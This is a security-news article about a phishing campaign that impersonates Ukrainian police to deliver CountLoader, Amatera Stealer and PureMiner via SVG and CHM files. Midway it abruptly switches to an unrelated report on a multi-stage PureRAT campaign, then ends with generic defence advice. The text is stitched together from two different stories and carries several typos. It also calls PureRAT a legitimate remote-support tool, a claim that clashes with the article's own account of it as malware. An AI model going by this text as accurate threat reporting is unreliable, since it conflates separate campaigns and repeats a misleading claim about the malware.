Ukrainian Government Agencies Targeted in Phishing Campaign Delivering CountLoader, Amatera Stealer, adn pureminer
Table of Contents
A new campaign has been observed impersonating Ukrainian government agencies in phishing attacks to deliver CountLoader, which is then used to drop Amatera Stealer and PureMiner.
“The phishing emails contain malicious Scalable Vector Graphics (SVG) files designed to trick recipients into opening harmful attachments,” Fortinet FortiGuard Labs researcher Yurren Wan said in a report shared with The Hacker News.
In the attack chains documented by the cybersecurity company, the SVG files are used to initiate the download of a password-protected ZIP archive, which contains a Compiled HTML Help (CHM) file. The CHM file, when launched, activates a chain of events that culminate in the deployment of CountLoader. The email messages claim to be a notice from the National Police of Ukraine.
CountLoader, which was the subject of a recent analysis by silent Push, has been found to drop various payloads like Cobalt Strike, AdaptixC2, and PureHVNC RAT. In this attack chain, however, it serves as a distribution vector for Amatera Stealer, a variant of ACRStealer, and PureMiner, a stealthy .NET cryptocurrency miner.
Evolving Phishing Campaign Leverages PureRAT Backdoor for Complete System Control
A recent cybersecurity campaign, detailed by Huntress researchers, demonstrates a significant evolution in tactics, techniques, and procedures (TTPs) employed by a threat actor. Starting with basic phishing lures, the campaign escalates through multiple layers of obfuscation and defense evasion to ultimately deploy the complex PureRAT remote access trojan (RAT), granting attackers full control over compromised systems. This progression highlights a maturing operator with increasing technical capabilities.
From Simple Phishing to Sophisticated Backdoor
The campaign begins with deceptively simple phishing emails designed to trick recipients into downloading malicious payloads. However, the attackers don’t immediately deploy the final payload.Instead,they utilize a multi-stage approach:
* Initial Phishing Lure: The campaign starts with a basic phishing email,likely containing malicious attachments or links.
* In-Memory Loaders: Once executed, the initial payload leverages in-memory loaders to evade conventional file-based detection methods. These loaders operate entirely in the computer’s memory, making them harder to identify.
* Defense Evasion: The attackers employ techniques to bypass security software and remain undetected on the compromised system.
* Credential Theft: Before deploying the final payload, the attackers actively attempt to steal credentials, providing further access and persistence within the network.
* PureRAT Deployment: The culmination of this process is the deployment of PureRAT, a modular and professionally developed backdoor. Huntress describes PureRAT as providing attackers with “complete control over a compromised host.”
Understanding purerat
PureRAT is a commercially available RAT, meaning it’s a tool developed for legitimate purposes (like remote support) but often abused by malicious actors. Its modular design allows attackers to customize its functionality, adding capabilities like:
* File Management: Remote access to and manipulation of files on the compromised system.
* Keylogging: Recording keystrokes to capture usernames, passwords, and othre sensitive details.
* Screenshot Capture: Taking screenshots of the victim’s screen.
* Remote Command Execution: Executing commands directly on the compromised system.
* Webcam Access: Accessing the victim’s webcam.
* Credential Harvesting: Stealing stored credentials from browsers and other applications.
The use of PureRAT signifies a shift from basic, quickly-developed malware to a more robust and feature-rich solution, indicating a more serious and dedicated threat actor.
The Significance of the Evolution
According to James northey, a security researcher at Huntress, this campaign’s evolution is noteworthy. He stated, “Their progression from amateurish obfuscation of their Python payloads to abusing commodity malware like PureRAT shows not just persistence, but also hallmarks of a serious and maturing operator.”
This progression suggests the threat actor is:
* Learning and Adapting: They are actively refining their techniques based on the success (or failure) of previous attempts.
* Increasingly Sophisticated: They are moving beyond simple malware and utilizing more advanced tools and techniques.
* Focused on Long-Term Access: The multi-stage approach and use of a powerful RAT like PureRAT indicate a desire for sustained access to compromised systems.
Key Takeaways
* Phishing remains a primary attack vector: Even sophisticated campaigns frequently enough start with a simple phishing email.
* Multi-stage attacks are becoming more common: Attackers are using multiple layers of obfuscation and evasion to bypass security measures.
* Commodity malware is a significant threat: Legitimate tools like PureRAT are frequently abused by malicious actors.
* Threat actors are evolving: Cybercriminals are constantly refining their techniques and becoming more sophisticated.
Protecting Against This Threat
Organizations should focus on a layered security approach to mitigate the risk of this type of campaign:
* Employee Training: Educate employees about phishing tactics and how to identify suspicious emails.
* Email Security: Implement robust email filtering and security solutions to block malicious emails.
* Endpoint Detection and Response (EDR): Deploy EDR solutions to detect and respond to malicious activity on endpoints.
* Network Segmentation: segment the network to limit the impact of a successful breach.
* Regular Security Audits: Conduct regular security audits to identify and address vulnerabilities.
This evolving threat landscape requires constant vigilance and a proactive security posture. As attackers continue to refine their techniques, organizations must adapt their defenses accordingly to stay ahead of the curve.